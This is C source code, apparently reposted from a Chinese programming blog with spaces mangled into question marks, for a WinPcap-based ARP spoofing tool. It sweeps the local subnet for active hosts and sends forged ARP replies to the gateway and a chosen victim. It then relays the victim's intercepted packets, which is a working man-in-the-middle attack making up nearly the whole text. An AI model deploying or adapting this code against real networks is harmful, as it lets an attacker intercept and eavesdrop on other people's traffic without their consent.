DWORD?dwRetVal?=?0;;
//ULONG?p;
pAdapterInfo?=?(IP_ADAPTER_INFO?*)?malloc(?sizeof(IP_ADAPTER_INFO)?);
ULONG?ulOutBufLen?=?sizeof(IP_ADAPTER_INFO);
//?Make?an?initial?call?to?GetAdaptersInfo?to?get
//?the?necessary?size?into?the?ulOutBufLen?variable
if?(GetAdaptersInfo(?pAdapterInfo,?&ulOutBufLen)?==?ERROR_BUFFER_OVERFLOW)?
{
free(pAdapterInfo);?//malloc動態聲請的空間要free
pAdapterInfo?=?(IP_ADAPTER_INFO?*)?malloc?(ulOutBufLen);?
}
if?((dwRetVal?=?GetAdaptersInfo(?pAdapterInfo,?&ulOutBufLen))?==?NO_ERROR)?
{
pAdapter?=?pAdapterInfo;
???while?(pAdapter)?
{
if(myip->ip==inet_addr(pAdapter->IpAddressList.IpAddress.String))
???{
???gateip->ip=inet_addr(pAdapter->GatewayList.IpAddress.String);
???return?1;
???}
printf("\t***\n");
???pAdapter?=?pAdapter->Next;
}
}
return?0;
}
int?getmmac()
{?
unsigned?char?sendbuf[42];
int?i=7,k;
ETHDR?eth;
ARPHDR?arp;
struct?pcap_pkthdr?*?pkt_header;
u_char?*?pkt_data;?
for(k=0;k<6;k++)
{
eth.eh_dst[k]=0xff;
eth.eh_src[k]=0x0f;
arp.arp_sha[k]=0x0f;
arp.arp_tha[k]=0x00;
}
eth.eh_type=htons(ETH_ARP);
arp.arp_hdr=htons(ARP_HARDWARE);
arp.arp_pro=htons(ETH_IP);
arp.arp_hln=6;
arp.arp_pln=4;
arp.arp_opt=htons(ARP_REQUEST);
arp.arp_tpa=myip->ip;
arp.arp_spa=inet_addr("127.0.0.2");?//隨便設的請求方ip
memset(sendbuf,0,sizeof(sendbuf));
memcpy(sendbuf,e,sizeof(eth));
memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));
if(pcap_sendpacket(slecadopt,sendbuf,42)==0)
{
printf("PacketSend?succeed\n\n");
}
else
{
printf("PacketSendPacket?in?getmine?Error:?%d\n",GetLastError());
return?0;
}
while((k=pcap_next_ex(slecadopt,&pkt_header,(const?u_char**)&pkt_data))>=0)
{?
if(*(unsigned?short?*)(pkt_data+12)==htons(ETH_ARP)&&*(unsigned?short*)(pkt_data+20)==htons(ARP_REPLY)&&*(unsigned?long*)(pkt_data+38)==inet_addr("127.0.0.2"))
{
for(i=0;i<6;i++)
{
myip->mac=*(unsigned?char*)(pkt_data+22+i);
}
break;
}
}
if(i==6)
{
return?1;
}
else
{
return?0;
}
}
unsigned?int?_stdcall?sendpackettogetallacttiveIpwithMac(void?*x)
{?
ULONG?tip,subnetsta,subnetend;
unsigned?char?sendbuf[42];
int?k;
ETHDR?eth;
ARPHDR?arp;
subnetsta=htonl(myip->ip&mynetmask);?//計算內網ip起點
subnetend=htonl(htonl(subnetsta)|(~mynetmask));?//計算內網ip結束
for(k=0;k<6;k++)
{
eth.eh_dst[k]=0xff;
eth.eh_src[k]=myip->mac[k];
arp.arp_sha[k]=myip->mac[k];
arp.arp_tha[k]=0x00;
}
eth.eh_type=htons(ETH_ARP);
arp.arp_hdr=htons(ARP_HARDWARE);
arp.arp_pro=htons(ETH_IP);
arp.arp_hln=6;
arp.arp_pln=4;
arp.arp_opt=htons(ARP_REQUEST);
arp.arp_spa=myip->ip;
memset(sendbuf,0,sizeof(sendbuf));
memcpy(sendbuf,e,sizeof(eth));
for(tip=subnetsta;tip<=subnetend;tip++)
{
arp.arp_tpa=htonl(tip);
memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));
???if(pcap_sendpacket(slecadopt,sendbuf,42)!=0)
{
printf("Getallactive?ip?PacketSendPacket?in?getmine?Error:?%d\n",GetLastError());
return?0;
}
}
return?1;
}
unsigned?int?_stdcall?recvpackettogetallacttiveIpwithMac(void?*x)
{?
struct?pcap_pkthdr?*?pkt_header;
u_char?*?pkt_data;?
PacttiveIpwithMac?p,q;
int?i;
while((pcap_next_ex(slecadopt,&pkt_header,(const?u_char**)&pkt_data))>0)
{?
if(*(unsigned?short?*)(pkt_data+12)==htons(ETH_ARP)&&*(unsigned?short*)(pkt_data+20)==htons(ARP_REPLY)&&*(unsigned?long*)(pkt_data+38)==myip->ip)
{
p=new?acttiveIpwithMac;
p->next=NULL;
p->ip=*(unsigned?long*)(pkt_data+28);
for(i=0;i<6;i++)
{
???p->mac=*(unsigned?char*)(pkt_data+22+i);
}
if(Pipmachead==NULL)
{?
???Pipmachead=p;
q=p;
}
else
{
q->next=p;
q=p;
}?
}
if(Ssendover==1)
{
???return?1;
}
}
return?1;
}
unsigned?int?_stdcall?transmitandsniffer(void?*x)
{
struct?changemac
{
unsigned?char?mac[12];
};
unsigned?char?bcast[6];
memset(bcast,0xff,sizeof(bcast));
unsigned?char?sendbuf[1600];
struct?pcap_pkthdr?*?pkt_header;
u_char?*?pkt_data;
changemac?*cmac,*togatewaymac;
PacttiveIpwithMac?z;
int?i,j;
cmac=new?changemac;
togatewaymac=new?changemac;
memcpy(togatewaymac->mac,gateip->mac,6);
memcpy(togatewaymac->mac+6,myip->mac,6);
//printf("1have?run?to?here!!!\n");
while((j=pcap_next_ex(slecadopt,&pkt_header,(const?u_char**)&pkt_data))>=0)
{?
???if(j==0)
{
//printf("2have?run?to?here!!!\n");
continue;
}
if(*(unsigned?short?*)(pkt_data+12)==htons(ETH_IP)&&(!(memcmp(pkt_data+6,myip->mac,6)==0))&&*(unsigned?long?*)(pkt_data+30)!=myip->ip&&(!(memcmp(pkt_data,bcast,6)==0)))//(*(unsigned?char*)(pkt_data+6)==myip->mac[0]&&*(unsigned?char*)(pkt_data+7)==myip->mac[1]&&*(unsigned?char*)(pkt_data+8)==myip->mac[2]&&*(unsigned?char*)(pkt_data+9)==myip->mac[3]&&*(unsigned?char*)(pkt_data+10)==myip->mac[4]&&*(unsigned?char*)(pkt_data+11)==myip->mac[5])))
{
//if()//(!(*(unsigned?char*)(pkt_data+0)==0xff&&*(unsigned?char*)(pkt_data+1)==0xff&&*(unsigned?char*)(pkt_data+2)==0xff&&*(unsigned?char*)(pkt_data+3)==0xff&&*(unsigned?char*)(pkt_data+4)==0xff&&*(unsigned?char*)(pkt_data+5)==0xff))&&)
//{?//for(i=0;i<6;i++)
//?printf("%02x:",*(unsigned?char*)(pkt_data+i));
//printf("33have?run?to?here!!!\n");
memcpy(sendbuf,pkt_data,pkt_header->caplen);
???memcpy(sendbuf,togatewaymac,12);
for(z=Pipmachead;z!=NULL;z=z->next)
{//printf("444have?run?to?here!!!\n");
???if(*(unsigned?long?*)(pkt_data+30)==z->ip)
{
???i=0;
//printf("jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjip=%s",iptos(z->ip));
???//for(;i<6;i++)
???//cmac->mac=z->mac;
memcpy(cmac->mac,z->mac,6);
???//for(;i<12;i++)
???//cmac->mac=myip->mac[i-6];
memcpy(cmac->mac+6,myip->mac,6);
???//memset(sendbuf,0,sizeof(sendbuf));
???memcpy(sendbuf,cmac,12);
??????/*if(*///!=0)
break;
//{
???//?printf("tansmit?Error:?%d\n",GetLastError());
???//?return?0;
//?}
}?
}
pcap_sendpacket(slecadopt,sendbuf,pkt_header->caplen);
???
//}//printf("getip:%s?len:%d\n",iptos(*(unsigned?long?*)(pkt_data+30)),pkt_header->caplen);
}
}
return?1;
}
unsigned?int?_stdcall?sproof(void?*x)
{
int?j,i=*(int*)x;
unsigned?char?sendbuftogate[42],sendbuftosp[42],rsendbuftogate[42],rsendbuftosp[42];
PacttiveIpwithMac?spip;
ETHDR?eth;
ARPHDR?arp;
int?k;
for(spip=Pipmachead,j=0;j<i-1;spip=spip->next,j++);
printf("%-3d?ip=%-20s?mac=%02x:%02x:%02x:%02x:%02x:%02x\n",i,iptos(spip->ip),spip->mac[0],spip->mac[1],spip->mac[2],spip->mac[3],spip->mac[4],spip->mac[5]);
for(k=0;k<6;k++)
{
eth.eh_dst[k]=gateip->mac[k];
eth.eh_src[k]=myip->mac[k];
arp.arp_sha[k]=myip->mac[k];
arp.arp_tha[k]=gateip->mac[k];
}
eth.eh_type=htons(ETH_ARP);
arp.arp_hdr=htons(ARP_HARDWARE);
arp.arp_pro=htons(ETH_IP);
arp.arp_hln=6;
arp.arp_pln=4;
arp.arp_opt=htons(ARP_REPLY);
arp.arp_spa=spip->ip;
arp.arp_tpa=gateip->ip;
memset(sendbuftogate,0,sizeof(sendbuftogate));
memcpy(sendbuftogate,e,sizeof(eth));
memcpy(sendbuftogate+sizeof(eth),&arp,sizeof(arp));
for(k=0;k<6;k++)
{
eth.eh_dst[k]=spip->mac[k];
eth.eh_src[k]=myip->mac[k];
arp.arp_sha[k]=myip->mac[k];
arp.arp_tha[k]=spip->mac[k];
}
arp.arp_spa=gateip->ip;
arp.arp_tpa=spip->ip;
memset(sendbuftosp,0,sizeof(sendbuftosp));
memcpy(sendbuftosp,e,sizeof(eth));
memcpy(sendbuftosp+sizeof(eth),&arp,sizeof(arp));
for(k=0;k<6;k++)
{
eth.eh_dst[k]=spip->mac[k];
eth.eh_src[k]=gateip->mac[k];
arp.arp_sha[k]=gateip->mac[k];
arp.arp_tha[k]=spip->mac[k];
}
arp.arp_spa=gateip->ip;
arp.arp_tpa=spip->ip;
memset(rsendbuftosp,0,sizeof(rsendbuftosp));
memcpy(rsendbuftosp,e,sizeof(eth));
memcpy(rsendbuftosp+sizeof(eth),&arp,sizeof(arp));
for(k=0;k<6;k++)
{
eth.eh_dst[k]=gateip->mac[k];
eth.eh_src[k]=spip->mac[k];
arp.arp_sha[k]=spip->mac[k];
arp.arp_tha[k]=gateip->mac[k];
}
arp.arp_spa=spip->ip;
arp.arp_tpa=gateip->ip;
memset(rsendbuftogate,0,sizeof(rsendbuftogate));
memcpy(rsendbuftogate,e,sizeof(eth));
memcpy(rsendbuftogate+sizeof(eth),&arp,sizeof(arp));
printf("已經進入%d號機的欺騙!!!\n",i);
while(TRUE)
{?
if(pcap_sendpacket(slecadopt,sendbuftogate,42)!=0)
{
???printf("sendbuftogate?Error:?%d\n",GetLastError());
???return?0;
}
???if(pcap_sendpacket(slecadopt,sendbuftosp,42)!=0)
{
???printf("sendbuftosp?Error:?%d\n",GetLastError());
???return?0;
}
Sleep(980);
if(cheat[i-1]==0)?//重置被欺騙的目標機!!
{
for(j=10;j>0;j--)
{
if(pcap_sendpacket(slecadopt,rsendbuftogate,42)!=0)
{
???printf("sendbuftogate?Error:?%d\n",GetLastError());
???return?0;
}
???if(pcap_sendpacket(slecadopt,rsendbuftosp,42)!=0)
{
???printf("sendbuftosp?Error:?%d\n",GetLastError());
???return?0;
}
}
printf("已經退出對%d號機的欺騙!!!\n",i);
return?1;
}
}
}
from:?http://www.cnblogs.com/qq78292959/archive/2008/10/13/2077113.html
總結
- 上一篇: Android Linux下开发环境搭建
- 下一篇: 彩色RGB图像转为灰度图像